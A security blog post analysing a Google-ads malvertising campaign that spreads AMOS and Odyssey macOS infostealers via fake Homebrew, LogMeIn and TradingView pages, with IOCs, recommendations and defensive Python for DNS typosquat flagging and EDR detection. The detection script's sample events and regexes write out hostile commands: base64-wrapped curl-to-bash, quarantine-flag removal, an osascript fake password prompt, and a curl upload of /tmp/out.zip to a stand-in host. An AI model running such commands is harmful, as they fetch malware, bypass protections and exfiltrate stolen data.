
Introduction: the problem and why it matters
A new malvertising wave is pushing macOS infostealers by impersonating Homebrew, LogMeIn, and TradingView in sponsored Google Search results. The campaign uses polished fake download/“verification” pages and ClickFix social engineering (copy-paste a Terminal command) to install AMOS (Atomic macOS Stealer) or Odyssey on victims’ machines. Researchers tied the operation to 85+ look-alike domains and observed clipboard manipulation that silently replaces a copied “code” or “verification” string with a base64-encoded installer command. This is a high-yield path to developers, traders, and remote-access users—high-value targets for credential and wallet theft.
In brief (TL;DR)
- Threat actors bought Google Ads to rank fake Homebrew/LogMeIn/TradingView sites, then tricked users into running curl|bash commands that fetch a malicious installer.
- The payload is AMOS or Odyssey, both capable of stealing browser data, Keychain credentials, and crypto wallets; Odyssey is a rebrand/evolution of Poseidon with extensive macOS targeting.
- Researchers mapped 85+ phishing domains and linked them via reused SSL certs, IPs, and code patterns—evidence of a persistent, evolving infrastructure.
- This continues a pattern of Homebrew malvertising observed since January 2025, where ads display brew.sh but redirect to look-alike domains.
Campaign context and history
Malvertising that hijacks developer tooling searches is not new. In January 2025, security outlets documented fake Homebrew ads that showed the real brew.sh in the ad but sent users to a near-duplicate domain (e.g., brewe[.]sh) that instructed a Terminal install—ultimately dropping AMOS. Google removed the specific ads at the time, but the lure model persisted. The new October 18, 2025 wave broadens the brand set (Homebrew, LogMeIn, TradingView) and layers in more polished ClickFix flows.
Technical analysis: delivery, payloads, infrastructure
Delivery chain & social engineering
- Entry: Sponsored Google result for a software brand (Homebrew/LogMeIn/TradingView).
- Landing: A pixel-perfect spoof with a “Copy” button. For TradingView, the page calls this a “connection security confirmation step.”
- ClickFix: The button silently puts a base64-encoded curl command on the clipboard instead of the visible token/code; users paste it into Terminal, believing it’s required.
- Installer: The command downloads and decodes an install.sh, clears quarantine/xattr, and executes a Mach-O payload—AMOS or Odyssey.
Payload capabilities
- AMOS (Atomic macOS Stealer)—MaaS sold (historically around $1,000/month), steals credentials, cookies, Keychain items, crypto wallets, system info; recent reports note a backdoor component for persistence and remote control.
- Odyssey Stealer—a Poseidon rebrand/fork focused on macOS; uses AppleScript/osascript, fakes password prompts, targets Chrome/Firefox/Safari artifacts plus >100 wallet extensions; packages loot into out.zip and exfiltrates via curl.
Infrastructure & indicators
Threat-hunting uncovered 85+ impersonation domains (e.g., homebrewonline[.]org, logmeeine[.]com, tradingviewen[.]com) with overlaps in SSL certificates, JARM fingerprints, and IP reuse (e.g., 93.152.230[.]79, 195.82.147[.]38). Some hosts expose multiple services (HTTP/SSH/FTP/IMAPS/POP3S) and even FASTPANEL admin interfaces—signs of multi-purpose servers running several campaigns in parallel.
Practical business impact and risks
- Account takeover & session hijacking: Theft of cookies, tokens, and saved passwords enables immediate lateral movement across SaaS, developer platforms, and trading accounts.
- Developer supply-chain exposure: Compromised dev workstations (with package managers, signing keys, CI tokens) raise software supply-chain risk.
- Financial loss: Direct crypto-wallet theft and fraudulent trades from TradingView-adjacent credentials.
- Detection evasion: Gatekeeper bypass via quarantine flag removal and anti-VM checks reduce sandbox visibility and delay response.
Operational recommendations / what to do next
1) Reduce exposure to ClickFix malvertising
- Policy: Forbid copy-pasting Terminal commands from web pages; require reviewed install scripts (internal repo) for tools like Homebrew.
- Awareness: Teach users to verify canonical domains (brew.sh, logmein.com, tradingview.com) and to avoid sponsored results when downloading software.
2) Harden macOS endpoints
- Block/alert on bash -c "$(curl ...)", osascript network activity, and quarantine attribute removal (xattr -dr com.apple.quarantine).
- Constrain script interpreters: Use application control to restrict bash/zsh/osascript execution outside approved paths; consider blocking osascript where business-justified.
- Browser secrets: Enforce password managers with no local storage, and isolate developer browsers (profiles/containers) to reduce token sprawl.
3) Network & threat-intel controls
- Block IOCs related to Odyssey/AMOS (sample IPs/domains from research) and monitor for connections to uncommon ports or FASTPANEL-like admin panels on outbound.
- DNS filtering to sinkhole newly observed typosquats for brand terms (homebrew, logmein, tradingview).
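The DNS-filtering recommendation above needs a way to pick look-alike domains out of a query feed. The following is an added example, not code from the article or any of the cited researchers: it allowlists the three canonical domains the article names, flags registrable domains that embed a brand term or sit close to a canonical label by edit similarity, and runs that check over a few constructed DNS log lines. The similarity threshold, the naive two-label "registrable domain" split, and the log format are assumptions to adapt to your own resolver and public-suffix handling.

```python
"""Flag look-alike domains for the brand terms in the article (added example).

Assumptions: a DNS log with 'query=<domain>' fields, a two-label registrable
domain split, and a 0.8 similarity threshold. Sample input is constructed.
"""
import re
from difflib import SequenceMatcher

# Canonical domains named in the article; extend with any brand-owned domains you verify.
CANONICAL = {"brew.sh", "logmein.com", "tradingview.com"}
BRAND_TERMS = ("homebrew", "brew", "logmein", "tradingview")
SIMILARITY_THRESHOLD = 0.8  # assumption; tune against your own false-positive rate


def normalize(domain: str) -> str:
    """Lower-case, strip a trailing dot, and undo defanging such as 'example[.]com'."""
    return domain.strip().lower().replace("[.]", ".").rstrip(".")


def registrable(domain: str) -> str:
    """Naive registrable domain (last two labels). Use the public suffix list in production."""
    labels = domain.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else domain


def is_canonical(domain: str) -> bool:
    """True for a canonical domain or any subdomain of one (e.g. docs.brew.sh)."""
    return any(domain == c or domain.endswith("." + c) for c in CANONICAL)


def score_domain(domain: str):
    """Return (verdict, reasons); verdict is 'allow', 'flag' or 'ignore'."""
    d = normalize(domain)
    if is_canonical(d):
        return "allow", ["on allowlist"]
    label = registrable(d).split(".")[0]
    reasons = [f"contains brand term '{t}'" for t in BRAND_TERMS if t in label]
    for c in CANONICAL:
        target = c.split(".")[0]
        ratio = SequenceMatcher(None, label, target).ratio()
        if ratio >= SIMILARITY_THRESHOLD:
            reasons.append(f"{ratio:.2f} similar to '{target}'")
    return ("flag" if reasons else "ignore"), reasons


# Constructed resolver log lines (RFC 5737 client address); not real telemetry.
SAMPLE_DNS_LOG = [
    "2025-10-18T10:00:01Z client=192.0.2.5 query=brew.sh type=A",
    "2025-10-18T10:00:02Z client=192.0.2.5 query=docs.brew.sh type=A",
    "2025-10-18T10:00:05Z client=192.0.2.7 query=homebrewonline.org type=A",
    "2025-10-18T10:00:09Z client=192.0.2.9 query=logmeeine.com type=A",
    "2025-10-18T10:00:12Z client=192.0.2.9 query=github.com type=A",
]


def scan_dns_log(lines):
    """Return {domain: reasons} for every flagged query in the log."""
    flagged = {}
    for line in lines:
        m = re.search(r"query=(\S+)", line)
        if not m:
            continue
        verdict, reasons = score_domain(m.group(1))
        if verdict == "flag":
            flagged[normalize(m.group(1))] = reasons
    return flagged


if __name__ == "__main__":
    for domain, reasons in scan_dns_log(SAMPLE_DNS_LOG).items():
        print(f"FLAG {domain}: {'; '.join(reasons)}")
```

Feed the flagged set into your DNS sinkhole review queue rather than blocking automatically: brand terms also appear in legitimate community and documentation domains, so the allowlist needs curating before this runs unattended.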
4) Detections you can deploy today (starter ideas)
- EDR rule: Terminal paste → base64 decode → curl → bash chain within a short window.
- Telemetry hunt: Processes where pbpaste or clipboard APIs precede bash/curl.
- File creation of /tmp/* followed by zip/curl -F or repeated HTTP POST retries (Odyssey behavior).
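The starter ideas above (and the block/alert list under "Harden macOS endpoints") can be expressed as rules over process telemetry. What follows is an added example, written here and not taken from the article or from any EDR vendor: it defines a few regex-based rules for the curl-to-shell chain (including the base64-wrapped form), quarantine attribute removal, a clipboard read followed by a shell or curl launch from the same parent, an osascript password dialog, and /tmp staging with repeated curl -F posts, then runs them over a constructed process event list. Field names, the 60-second window, and the sample command lines are assumptions; the encoded command in the sample is generated in the code and points at a reserved example host.

```python
"""Starter detections for the ClickFix -> curl -> bash chain (added example).

Assumptions: EDR process events with ts/pid/ppid/cmdline, a 60 s correlation
window, and the regexes below. Sample telemetry is constructed, not real.
"""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    ts: float      # seconds since epoch
    pid: int
    ppid: int
    cmdline: str   # full command line as the EDR recorded it


# curl piped into a shell, or bash -c "$(curl ...)"
CURL_TO_SHELL = re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b|\b(?:ba|z)?sh\b\s+-c\s+[\"']?\$\(\s*curl\b")
B64_DECODE = re.compile(r"\bbase64\b\s+(?:-d|-D|--decode)\b")
QUARANTINE_RM = re.compile(r"\bxattr\b.*\s-(?:d|dr|rd)\s.*\bcom\.apple\.quarantine\b")
FAKE_PW_PROMPT = re.compile(r"\bosascript\b.*display dialog.*with hidden answer", re.I)
TMP_POST = re.compile(r"\bcurl\b.*\s-F\s+\S*@/tmp/")
CLIPBOARD = re.compile(r"\bpbpaste\b")
SHELL_OR_CURL = re.compile(r"\b(?:bash|zsh|sh|curl|base64)\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decoded_payloads(cmdline):
    """Yield plaintext of every base64 token in the command line that decodes cleanly."""
    for tok in B64_TOKEN.findall(cmdline):
        try:
            yield base64.b64decode(tok, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue


def detect(events, window=60.0):
    """Apply the rules; return a sorted list of (rule_name, pid) findings."""
    hits = set()
    evs = sorted(events, key=lambda e: e.ts)
    posts = defaultdict(list)  # (ppid, cmdline) -> timestamps of curl -F uploads
    for i, e in enumerate(evs):
        views = [e.cmdline] + list(decoded_payloads(e.cmdline))
        if any(CURL_TO_SHELL.search(v) for v in views):
            hits.add(("curl_to_bash", e.pid))
        if B64_DECODE.search(e.cmdline) and any("curl" in v for v in views[1:]):
            hits.add(("base64_wrapped_curl", e.pid))
        if QUARANTINE_RM.search(e.cmdline):
            hits.add(("quarantine_removed", e.pid))
        if FAKE_PW_PROMPT.search(e.cmdline):
            hits.add(("fake_password_prompt", e.pid))
        if TMP_POST.search(e.cmdline):
            hits.add(("tmp_stage_and_post", e.pid))
            posts[(e.ppid, e.cmdline)].append(e.ts)
        if CLIPBOARD.search(e.cmdline):
            # clipboard read, then a shell/curl/base64 launch from the same parent within the window
            for later in evs[i + 1:]:
                if later.ts - e.ts > window:
                    break
                if later.ppid == e.ppid and SHELL_OR_CURL.search(later.cmdline):
                    hits.add(("pbpaste_then_shell", later.pid))
    for (ppid, _), stamps in posts.items():
        if len(stamps) >= 3 and stamps[-1] - stamps[0] <= window:
            hits.add(("post_retries", ppid))
    return sorted(hits)


# Constructed sample: the encoded command is built here and targets a reserved name.
ENCODED = base64.b64encode(b"curl -fsSL http://example.invalid/install.sh | bash").decode()
UPLOAD = "/usr/bin/curl -F file=@/tmp/out.zip http://203.0.113.10/p"  # TEST-NET-3 address
SAMPLE_EVENTS = [
    ProcEvent(100.0, 501, 500, "/bin/zsh -l"),
    ProcEvent(101.0, 502, 501, "/usr/bin/pbpaste"),
    ProcEvent(102.5, 503, 501, f"/bin/bash -c echo {ENCODED} | base64 -d | bash"),
    ProcEvent(103.0, 504, 503, "/usr/bin/xattr -dr com.apple.quarantine /tmp/installer"),
    ProcEvent(104.0, 505, 503, '/usr/bin/osascript -e display dialog "macOS needs your password" default answer "" with hidden answer'),
    ProcEvent(105.0, 506, 503, "/usr/bin/zip -r /tmp/out.zip /tmp/loot"),
    ProcEvent(106.0, 507, 503, UPLOAD),
    ProcEvent(107.0, 508, 503, UPLOAD),
    ProcEvent(108.0, 509, 503, UPLOAD),
    ProcEvent(300.0, 600, 500, "/usr/bin/brew install wget"),  # benign control
]

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:<22} pid={pid}")
```

The individual rules are noisy on developer machines (pbpaste and curl are everyday tools); the value is in the correlation, so alert when two or more fire under the same parent process rather than on any single match.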
5) Incident response playbook (when you suspect compromise)
- Isolate host; collect triage pack (bash history, /var/log/install.log, recent LaunchAgents/Daemons).
- Search for: out.zip, suspicious LaunchDaemons (e.g., fake Finder helpers), removed quarantine artifacts, and new Keychain prompts in user reports.
- Rotate browser and SSO tokens, reset passwords, invalidate sessions; review wallet activity.
- Hunt across fleet for the domain/IP and command patterns noted above.
Differences / comparisons with earlier cases
- Same lure family, broader brand set: January 2025 incidents focused on Homebrew; October 2025 adds LogMeIn/TradingView and refined clipboard-swap tricks.
- Payload evolution: Odyssey has matured into a Poseidon rebrand with robust AppleScript-based data theft and C2 ecosystem, competing with AMOS in the macOS MaaS market.
- Infrastructure reuse at scale: Hunt.io’s mapping of 85+ domains indicates a more persistent backend than one-off ad scams seen earlier in the year.
Summary — key takeaways
- Don’t paste Terminal commands from websites—standardize trusted, internally hosted installers.
- Treat sponsored results for popular tools as hostile by default; validate canonical domains.
- Detect and block the curl→bash pattern and osascript abuses; monitor for quarantine flag removals.
- Proactively block known IOCs and continuously hunt for new typosquats targeting your user base.
Sources / bibliography
- BleepingComputer — “Google ads for fake Homebrew, LogMeIn sites push infostealers,” Oct 18, 2025.
- Hunt.io — “Odyssey Stealer and AMOS Campaign Targets macOS Developers Through Fake Tools,” Oct 16, 2025.
- CYFIRMA — “Odyssey Stealer: The Rebrand of Poseidon Stealer,” Jun 26, 2025.
- SecurityWeek — “Homebrew macOS Users Targeted With Information Stealer Malware,” Jan 23, 2025.
- BleepingComputer — “Fake Mac fixes trick users into installing new Shamos infostealer,” Aug 22, 2025 (ClickFix background).

